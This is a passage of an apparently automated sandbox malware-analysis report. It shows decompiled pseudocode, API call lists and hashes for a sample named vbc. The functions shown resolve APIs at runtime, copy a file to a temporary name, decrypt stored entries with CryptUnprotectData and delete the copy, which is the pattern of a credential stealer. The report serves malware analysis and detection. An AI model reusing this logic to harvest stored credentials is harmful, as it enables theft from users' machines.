					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t241);
				 *[fs:eax] = _t241;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}








































                                                                                                    0x00408328
                                                                                                    0x00408329
                                                                                                    0x0040832b
                                                                                                    0x00408330
                                                                                                    0x00408330
                                                                                                    0x00408332
                                                                                                    0x00408334
                                                                                                    0x00408334
                                                                                                    0x00408334
                                                                                                    0x00408337
                                                                                                    0x00408338
                                                                                                    0x00408339
                                                                                                    0x0040833b
                                                                                                    0x00408341
                                                                                                    0x00408352
                                                                                                    0x00408353
                                                                                                    0x00408358
                                                                                                    0x0040835b
                                                                                                    0x0040835e
                                                                                                    0x00408368
                                                                                                    0x00408373
                                                                                                    0x0040837e
                                                                                                    0x00408389
                                                                                                    0x0040838e
                                                                                                    0x00408393
                                                                                                    0x00408396
                                                                                                    0x004083a3
                                                                                                    0x004083ae
                                                                                                    0x004083b8
                                                                                                    0x004083c7
                                                                                                    0x004083d1
                                                                                                    0x004083de
                                                                                                    0x004083eb
                                                                                                    0x004083f3
                                                                                                    0x004083f8
                                                                                                    0x004083fa
                                                                                                    0x004083fc
                                                                                                    0x00408401
                                                                                                    0x00408404
                                                                                                    0x00408411
                                                                                                    0x0040841c
                                                                                                    0x00408426
                                                                                                    0x00408435
                                                                                                    0x0040843f
                                                                                                    0x0040843f
                                                                                                    0x0040844d
                                                                                                    0x00408456
                                                                                                    0x00408458
                                                                                                    0x0040845a
                                                                                                    0x00408461
                                                                                                    0x00408475
                                                                                                    0x0040847c
                                                                                                    0x0040847c
                                                                                                    0x00408490
                                                                                                    0x004084a3
                                                                                                    0x004084aa
                                                                                                    0x004084bb
                                                                                                    0x004084c9
                                                                                                    0x004084d6
                                                                                                    0x004084e4
                                                                                                    0x004084e9
                                                                                                    0x004084ee
                                                                                                    0x004084fc
                                                                                                    0x00408512
                                                                                                    0x0040851f
                                                                                                    0x00408535
                                                                                                    0x00408542
                                                                                                    0x00408558
                                                                                                    0x00408565
                                                                                                    0x0040857b
                                                                                                    0x00408588
                                                                                                    0x0040859e
                                                                                                    0x004085ab
                                                                                                    0x004085c1
                                                                                                    0x004085ce
                                                                                                    0x004085e4
                                                                                                    0x004085f1
                                                                                                    0x00408607
                                                                                                    0x00408614
                                                                                                    0x0040862a
                                                                                                    0x00408637
                                                                                                    0x0040864d
                                                                                                    0x0040865a
                                                                                                    0x00408670
                                                                                                    0x0040867d
                                                                                                    0x00408693
                                                                                                    0x004086a0
                                                                                                    0x004086b6
                                                                                                    0x004086c2
                                                                                                    0x00408730
                                                                                                    0x00408730
                                                                                                    0x004086c2
                                                                                                    0x00408739
                                                                                                    0x0040873c
                                                                                                    0x0040873f
                                                                                                    0x0040874c
                                                                                                    0x00408759
                                                                                                    0x00408766
                                                                                                    0x00408773
                                                                                                    0x00408780

                                                                                                    APIs
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?), ref: 0040850D
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 00408530
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000), ref: 00408553
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C), ref: 00408576
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC), ref: 00408599
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008), ref: 004085BC
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004085DF
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408602
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408625
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408648
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040866B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040868E
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004086B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Directory$Create$CurrentLibraryLoad
                                                                                                    • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                    • API String ID: 1998666822-1089150275
                                                                                                    • Opcode ID: 985e44c51c59e8ee6989f45de44698a0f141bfbbbf747e03c4d8817034f6fa2f
                                                                                                    • Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
                                                                                                    • Opcode Fuzzy Hash: 985e44c51c59e8ee6989f45de44698a0f141bfbbbf747e03c4d8817034f6fa2f
                                                                                                    • Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401870 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1048 401870-401892 RtlInitializeCriticalSection 1049 401894-401899 RtlEnterCriticalSection 1048->1049 1050 40189e-4018d4 call 401234 * 3 LocalAlloc 1048->1050 1049->1050 1057 401905-401919 1050->1057 1058 4018d6 1050->1058 1062 401925 1057->1062 1063 40191b-401920 RtlLeaveCriticalSection 1057->1063 1059 4018db-4018ed 1058->1059 1059->1059 1061 4018ef-4018fe 1059->1061 1061->1057 1063->1062
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E00401870() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401926);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push("(.M");
				L004011C4();
				if( *0x41c035 != 0) {
					_push("(.M");
					L004011CC();
				}
				E00401234(0x41c5d4);
				E00401234(0x41c5e4);
				E00401234(0x41c610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x41c60c = _t11;
				if( *0x41c60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x41c60c; // 0x4d4a48
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
					 *0x41c5f4 = 0x41c5f4;
					 *0x41c600 = 0x41c5f4;
					 *0x41c5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040192D);
				if( *0x41c035 != 0) {
					_push("(.M");
					L004011D4();
					return 0;
				}
				return 0;
			}








                                                                                                    0x00401875
                                                                                                    0x00401876
                                                                                                    0x0040187b
                                                                                                    0x0040187e
                                                                                                    0x00401881
                                                                                                    0x00401886
                                                                                                    0x00401892
                                                                                                    0x00401894
                                                                                                    0x00401899
                                                                                                    0x00401899
                                                                                                    0x004018a3
                                                                                                    0x004018ad
                                                                                                    0x004018b7
                                                                                                    0x004018c3
                                                                                                    0x004018c8
                                                                                                    0x004018d4
                                                                                                    0x004018d6
                                                                                                    0x004018db
                                                                                                    0x004018db
                                                                                                    0x004018e3
                                                                                                    0x004018e7
                                                                                                    0x004018e8
                                                                                                    0x004018f4
                                                                                                    0x004018f7
                                                                                                    0x004018f9
                                                                                                    0x004018fe
                                                                                                    0x004018fe
                                                                                                    0x00401907
                                                                                                    0x0040190a
                                                                                                    0x0040190d
                                                                                                    0x00401919
                                                                                                    0x0040191b
                                                                                                    0x00401920
                                                                                                    0x00000000
                                                                                                    0x00401920
                                                                                                    0x00401925

                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.KERNEL32((.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                    • RtlEnterCriticalSection.KERNEL32((.M,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                    • RtlLeaveCriticalSection.KERNEL32((.M,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                    • String ID: (.M$HJM
                                                                                                    • API String ID: 730355536-2950246024
                                                                                                    • Opcode ID: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
                                                                                                    • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                                                    • Opcode Fuzzy Hash: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
                                                                                                    • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004095A4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 49%
                                                                                                    			E004095A4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr* _t79;
				WCHAR* _t94;
				void* _t107;
				intOrPtr* _t126;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t134;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t155;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t181;
				void* _t183;
				intOrPtr _t193;
				void* _t201;
				intOrPtr _t212;
				void* _t219;
				intOrPtr _t228;
				intOrPtr _t229;
				void* _t230;
				void* _t231;

				_t226 = __esi;
				_t225 = __edi;
				_t191 = __ebx;
				_t228 = _t229;
				_push(__ecx);
				_t193 = 0xb;
				do {
					_push(0);
					_push(0);
					_t193 = _t193 - 1;
					_t234 = _t193;
				} while (_t193 != 0);
				_t1 =  &_v8;
				 *_t1 = _t193;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				 *[fs:eax] = _t229;
				E004034E4( &_v36);
				_t79 =  *0x41b580; // 0x41c6c4
				E00406FDC( *((intOrPtr*)( *_t79))( *[fs:eax], 0x409857, _t228, __ebx), __ebx,  &_v56, __esi, _t234);
				_push(_v56);
				E00406F1C( &_v60, __ebx, __edi, __esi, _t234);
				_push(_v60);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, __ebx,  &_v48, _t234);
				E004062D8(L"%TEMP%",  &_v68, _t234);
				_push(_v68);
				_push(0x409890);
				_push(_v44);
				E00403E1C();
				E0040781C(_v64, _t191,  &_v52, _t234);
				_t94 = E00403D3C(_v52);
				CopyFileW(E00403D3C(_v48), _t94, 0xffffffff); // executed
				E0040377C( &_v72, _v52);
				E00404AFC(_v72, _t191,  *_t1,  &_v40, __esi, _t234);
				E00403D2C( &_v76, _v40);
				_t107 = E004076B0(_v76, _t191,  *_t1); // executed
				if(_t107 != 0) {
					_t126 =  *0x41b55c; // 0x41c784
					_t128 =  *((intOrPtr*)( *_t126))(E00403990(_v40),  &_v20); // executed
					_t230 = _t229 + 8;
					if(_t128 == 0) {
						E00408120(0x62,  &_v80);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v20, E00403990(_v80), 0xffffffff,  &_v24,  &_v28); // executed
						_t231 = _t230 + 0x14;
						if(_t153 == 0) {
							while(1) {
								_push(_v24);
								_t155 =  *0x41b600; // 0x41c790
								if( *((intOrPtr*)( *_t155))() != 0x64) {
									goto L9;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v24, 2,  *((intOrPtr*)( *_t159))(_v24, 2));
								_t231 = _t231 + 0x10;
								_pop(_t219);
								E004094C4(_t165,  &_v32, _t219);
								_t168 = E00403790(_v32);
								__eflags = _t168;
								if(_t168 != 0) {
									_t170 =  *0x41b588; // 0x41c794
									E004036DC( &_v84,  *((intOrPtr*)( *_t170))(_v24, 1));
									E0040377C( &_v88, _v12);
									_t181 =  *0x41b588; // 0x41c794
									_t183 =  *((intOrPtr*)( *_t181))(_v24, 0, _v88, _v32, _v84);
									_t231 = _t231 + 0x10;
									E004036DC( &_v92, _t183);
									_push(_v92);
									E0040377C( &_v96, _v16);
									_pop(_t201);
									E00405210(0x40989c, _t191, _t201, _v96, _t225, _t226);
								}
							}
						}
					}
					L9:
					_t130 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t130))(_v24);
					_t134 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t134))(_v20); // executed
					E00403D2C(_a4, _v36);
					DeleteFileW(E00403D3C(_v52)); // executed
				}
				_pop(_t212);
				 *[fs:eax] = _t212;
				_push(E0040985E);
				E00403508( &_v96, 5);
				E00403B80( &_v76);
				E004034E4( &_v72);
				E00403B98( &_v68, 7);
				E004034E4( &_v40);
				E00403508( &_v36, 2);
				return E00403B98( &_v16, 3);
			}



















































                                                                                                    0x004095a4
                                                                                                    0x004095a4
                                                                                                    0x004095a4
                                                                                                    0x004095a5
                                                                                                    0x004095a7
                                                                                                    0x004095a8
                                                                                                    0x004095ad
                                                                                                    0x004095ad
                                                                                                    0x004095af
                                                                                                    0x004095b1
                                                                                                    0x004095b1
                                                                                                    0x004095b1
                                                                                                    0x004095b4
                                                                                                    0x004095b4
                                                                                                    0x004095b8
                                                                                                    0x004095bb
                                                                                                    0x004095be
                                                                                                    0x004095c4
                                                                                                    0x004095cc
                                                                                                    0x004095d4
                                                                                                    0x004095e4
                                                                                                    0x004095ea
                                                                                                    0x004095ef
                                                                                                    0x004095fb
                                                                                                    0x00409600
                                                                                                    0x00409606
                                                                                                    0x0040960b
                                                                                                    0x0040960e
                                                                                                    0x0040961b
                                                                                                    0x00409626
                                                                                                    0x00409633
                                                                                                    0x00409638
                                                                                                    0x0040963b
                                                                                                    0x00409640
                                                                                                    0x0040964b
                                                                                                    0x00409656
                                                                                                    0x00409660
                                                                                                    0x00409676
                                                                                                    0x0040967e
                                                                                                    0x00409689
                                                                                                    0x00409694
                                                                                                    0x0040969c
                                                                                                    0x004096a3
                                                                                                    0x004096b6
                                                                                                    0x004096bd
                                                                                                    0x004096bf
                                                                                                    0x004096c4
                                                                                                    0x004096dc
                                                                                                    0x004096ee
                                                                                                    0x004096f5
                                                                                                    0x004096f7
                                                                                                    0x004096fc
                                                                                                    0x004097ad
                                                                                                    0x004097b0
                                                                                                    0x004097b1
                                                                                                    0x004097be
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040970d
                                                                                                    0x00409720
                                                                                                    0x00409727
                                                                                                    0x00409729
                                                                                                    0x0040972f
                                                                                                    0x00409730
                                                                                                    0x00409738
                                                                                                    0x0040973d
                                                                                                    0x0040973f
                                                                                                    0x00409747
                                                                                                    0x00409758
                                                                                                    0x0040976b
                                                                                                    0x0040977a
                                                                                                    0x00409781
                                                                                                    0x00409783
                                                                                                    0x0040978b
                                                                                                    0x00409793
                                                                                                    0x0040979a
                                                                                                    0x004097a7
                                                                                                    0x004097a8
                                                                                                    0x004097a8
                                                                                                    0x0040973f
                                                                                                    0x004097ad
                                                                                                    0x004096fc
                                                                                                    0x004097c4
                                                                                                    0x004097c8
                                                                                                    0x004097cf
                                                                                                    0x004097d6
                                                                                                    0x004097dd
                                                                                                    0x004097e6
                                                                                                    0x004097fb
                                                                                                    0x004097fb
                                                                                                    0x004097ff
                                                                                                    0x00409802
                                                                                                    0x00409805
                                                                                                    0x00409812
                                                                                                    0x0040981a
                                                                                                    0x00409822
                                                                                                    0x0040982f
                                                                                                    0x00409837
                                                                                                    0x00409844
                                                                                                    0x00409856

                                                                                                    APIs
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676
                                                                                                      • Part of subcall function 004094C4: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                                                      • Part of subcall function 004094C4: LocalFree.KERNEL32(?), ref: 0040950A
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 004097FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CopyCryptDataDeleteFreeLocalUnprotect
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 691380987-3650661790
                                                                                                    • Opcode ID: aff096bd16069cd4b177f000ef9ea30393db51c7283037b831e6c9d6e30e9123
                                                                                                    • Instruction ID: 0066d1c1be5024352ad70b1cbef22ae6b56226110b13b2bd45aebffaaabcbc52
                                                                                                    • Opcode Fuzzy Hash: aff096bd16069cd4b177f000ef9ea30393db51c7283037b831e6c9d6e30e9123
                                                                                                    • Instruction Fuzzy Hash: 3981A471A10109AFDB00EB99D881E9EB7B9EF48304F108576F514F72A2DA39AE058B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401F5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1493 401f5c-401f6e 1494 401f70 call 401870 1493->1494 1495 401f79-401f7f 1493->1495 1499 401f75-401f77 1494->1499 1497 401f81-401f86 1495->1497 1498 401f8b-401fa0 1495->1498 1500 4020df-4020e8 1497->1500 1501 401fa2-401fa7 RtlEnterCriticalSection 1498->1501 1502 401fac-401fb5 1498->1502 1499->1495 1499->1497 1501->1502 1503 401fb7 1502->1503 1504 401fbc-401fc2 1502->1504 1503->1504 1505 401fc8-401fcc 1504->1505 1506 40205b-402061 1504->1506 1509 401fd1-401fe0 1505->1509 1510 401fce 1505->1510 1507 402063-402070 1506->1507 1508 4020ad-4020af call 401e68 1506->1508 1511 402072-40207a 1507->1511 1512 40207f-4020ab call 40303c 1507->1512 1518 4020b4-4020cb 1508->1518 1509->1506 1513 401fe2-401ff0 1509->1513 1510->1509 1511->1512 1512->1500 1516 401ff2-401ff6 1513->1516 1517 40200c-402010 1513->1517 1522 401ff8 1516->1522 1523 401ffb-40200a 1516->1523 1519 402012 1517->1519 1520 402015-402030 1517->1520 1526 4020d7 1518->1526 1527 4020cd-4020d2 RtlLeaveCriticalSection 1518->1527 1519->1520 1525 402032-402056 call 40303c 1520->1525 1522->1523 1523->1525 1525->1500 1527->1526
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32((.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                      • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32((.M,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                      • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                      • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32((.M,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                    • RtlEnterCriticalSection.KERNEL32((.M,00000000,004020D8), ref: 00401FA7
                                                                                                    • RtlLeaveCriticalSection.KERNEL32((.M,004020DF), ref: 004020D2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                    • String ID: (.M$HJM
                                                                                                    • API String ID: 2227675388-2950246024
                                                                                                    • Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                    • Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
                                                                                                    • Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                    • Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0040955E() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				 *0x41c7cc =  *0x41c7cc - 1;
				if( *0x41c7cc < 0) {
					_t2 = LoadLibraryA("crypt32.dll"); // executed
					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
					 *0x41c7c8 = _t3;
					return _t3;
				}
				return _t1;
			}






                                                                                                    0x00409560
                                                                                                    0x00409567
                                                                                                    0x00409573
                                                                                                    0x00409579
                                                                                                    0x0040957e
                                                                                                    0x00000000
                                                                                                    0x0040957e
                                                                                                    0x00409583

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00409573
                                                                                                    • GetProcAddress.KERNEL32(00000000,crypt32.dll,CryptUnprotectData), ref: 00409579
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                    • API String ID: 2574300362-1827663648
                                                                                                    • Opcode ID: 75ffce093a627a703e76a5faf482da699b1f717085a244e79174a14ab70f32b7
                                                                                                    • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
                                                                                                    • Opcode Fuzzy Hash: 75ffce093a627a703e76a5faf482da699b1f717085a244e79174a14ab70f32b7
                                                                                                    • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 27%
                                                                                                    			E00407C58() {
				long _v8;
				short _v10;
				char _v14;
				long _v20;
				long _v24;
				void* _v28;
				union _SID_NAME_USE _v32;
				char _v36;
				char _t21;
				short _t22;
				intOrPtr _t24;
				intOrPtr* _t26;
				intOrPtr* _t42;
				void* _t44;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;

				_t54 = _t56;
				_t57 = _t56 + 0xffffffe0;
				_v8 = 0;
				_t21 =  *0x41b0d0; // 0x0
				_v14 = _t21;
				_t22 =  *0x41b0d4; // 0x500
				_v10 = _t22;
				_t24 =  *0x41b0cc; // 0x12
				_t26 =  *0x41b5b0; // 0x41c720
				 *((intOrPtr*)( *_t26))( &_v14, 1, _t24, 0, 0, 0, 0, 0, 0, 0,  &_v28, _t53);
				if(_v28 == 0) {
					return _v8;
				} else {
					 *[fs:eax] = _t57;
					_v20 = 0;
					_v24 = 0;
					LookupAccountSidA(0, _v28, 0,  &_v20, 0,  &_v24,  &_v32); // executed
					_t42 =  *0x41b56c; // 0x41c72c
					_t44 =  *((intOrPtr*)( *_t42))(0, _v28,  &_v36,  *[fs:eax], 0x407d16, _t54); // executed
					if(_t44 != 0) {
						_v8 = _v36;
					} else {
						_v8 = 0;
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E00407D1D);
					return FreeSid(_v28);
				}
			}






















                                                                                                    0x00407c59
                                                                                                    0x00407c5b
                                                                                                    0x00407c60
                                                                                                    0x00407c63
                                                                                                    0x00407c69
                                                                                                    0x00407c6c
                                                                                                    0x00407c73
                                                                                                    0x00407c89
                                                                                                    0x00407c95
                                                                                                    0x00407c9c
                                                                                                    0x00407ca2
                                                                                                    0x00407d23
                                                                                                    0x00407ca4
                                                                                                    0x00407caf
                                                                                                    0x00407cb4
                                                                                                    0x00407cb9
                                                                                                    0x00407cd9
                                                                                                    0x00407ce5
                                                                                                    0x00407cec
